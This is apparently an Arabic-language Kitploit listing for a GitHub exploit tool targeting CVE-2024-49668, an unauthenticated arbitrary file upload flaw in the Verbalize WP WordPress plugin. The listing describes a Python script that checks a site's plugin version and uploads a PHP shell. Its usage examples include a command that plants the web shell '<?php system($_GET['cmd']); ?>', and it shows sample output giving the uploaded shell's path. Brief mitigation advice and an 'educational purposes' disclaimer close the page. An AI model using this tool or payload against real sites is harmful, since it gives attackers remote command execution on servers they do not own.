Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-49668 — إضافة Verbalize WP لووردبريس <= 1.0 - ثغرة رفع ملفات تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-49668
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-49668

CVE-2024-49668

إضافة Verbalize WP لووردبريس <= 1.0 - ثغرة رفع ملفات تعسفي

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🚨 CVE-2024-49668: ثغرة رفع الملفات التعسفي في إضافة Verbalize WP لووردبريس

📋 نظرة عامة

CVE-2024-49668 هي ثغرة خطيرة في إضافة Verbalize WP لووردبريس الإصدارات 1.0 وما دونها. تسمح هذه الثغرة للمهاجمين غير المصادقين برفع ملفات عشوائية، بما في ذلك شيلات الويب، إلى خادم الويب. تنشأ المشكلة بسبب عدم كفاية التحقق من صحة الإدخال وقيود نوع الملف أثناء رفع الملفات.

تفاصيل

  • تاريخ النشر: 2024-10-23
  • تاريخ التحديث: 2024-10-23
  • العنوان: إضافة Verbalize WP لووردبريس <= 1.0 – ثغرة رفع ملفات تعسفية
  • الوصف: ثغرة رفع ملف غير مقيد بنوع خطير في إضافة Admin Verbalize WP تسمح برفع شيل ويب إلى خادم الويب. تؤثر هذه المشكلة على Verbalize WP من n/a حتى 1.0.
  • CWE: CWE-434: رفع ملف غير مقيد بنوع خطير
  • درجة CVSS: 10.0 (حرجة)
  • سلسلة المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ سكربت الاستغلال

يستغل هذا السكربت المكتوب بلغة بايثون الثغرة CVE-2024-49668 لرفع ملف شيل إلى موقع ووردبريس المستهدف باستخدام إضافة Verbalize WP.

الميزات

  • فحص الثغرة تلقائياً: يتحقق السكربت مما إذا كان الموقع المستهدف ضعيفاً عن طريق التحقق من إصدار الإضافة في readme.txt.
  • رفع الملفات: رفع ملف شيل PHP إلى الموقع المستهدف.
  • استخراج المسار: استخراج وعرض المسار الكامل لملف الشيل الذي تم رفعه.

🧰 المتطلبات

  • Python 3.x
  • مكتبة requests

قم بتثبيت المكتبة المطلوبة باستخدام pip:

root@kitploit:~
pip install requests

🚀 الاستخدام

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

تنفيذ طلب POST إلى موقع ووردبريس.

options:
  -h, --help         إظهار رسالة المساعدة هذه والخروج
  -u, --url URL      عنوان URL المستهدف
  -s, --shell SHELL  كود الشيل لرفعه

مثال

بشكل افتراضي، سيقوم السكربت برفع شيل PHP ينفذ phpinfo().

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

يمكنك أيضاً تحديد كود شيل PHP مخصص لرفعه:

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 مخرجات السكربت

root@kitploit:~
الموقع معرض للخطر. يتم استغلال الإصدار: 1.0. جاري رفع الملف...
مسار الشيل: /wp-content/uploads/audio-text/4091/audio-demo.php
الاستغلال بواسطة: Nxploit, Khaled ALenazi

📚 معلومات إضافية

تأثير الثغرة

تمكن الثغرة CVE-2024-49668 المهاجمين من السيطرة الكاملة على الخادم المستهدف عن طريق رفع ملفات ضارة. يمكن أن يؤدي استغلال هذه الثغرة إلى عواقب وخيمة تشمل خروقات البيانات والوصول غير المصرح به والتشويه المحتمل للموقع.

أفضل الممارسات للتخفيف

لحماية موقع ووردبريس الخاص بك من هذه الثغرة، يُنصح بما يلي:

  • تحديث إضافة Verbalize WP إلى أحدث إصدار يعالج هذه المشكلة.
  • تطبيق عمليات تحقق قوية لرفع الملفات لتقييد أنواع وأحجام الملفات.
  • مراقبة سجلات الخادم بانتظام لأي نشاطات مشبوهة.

إخلاء مسؤولية قانوني

هذه الأداة مخصصة للأغراض التعليمية فقط. الاستخدام غير المصرح به لهذه الأداة ضد مواقع الويب دون إذن صريح من المالك غير قانوني. المؤلفون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


تم الإنشاء في 2025-03-22 بواسطة Nxploited , Khaled alenazi

تنزيل الأداة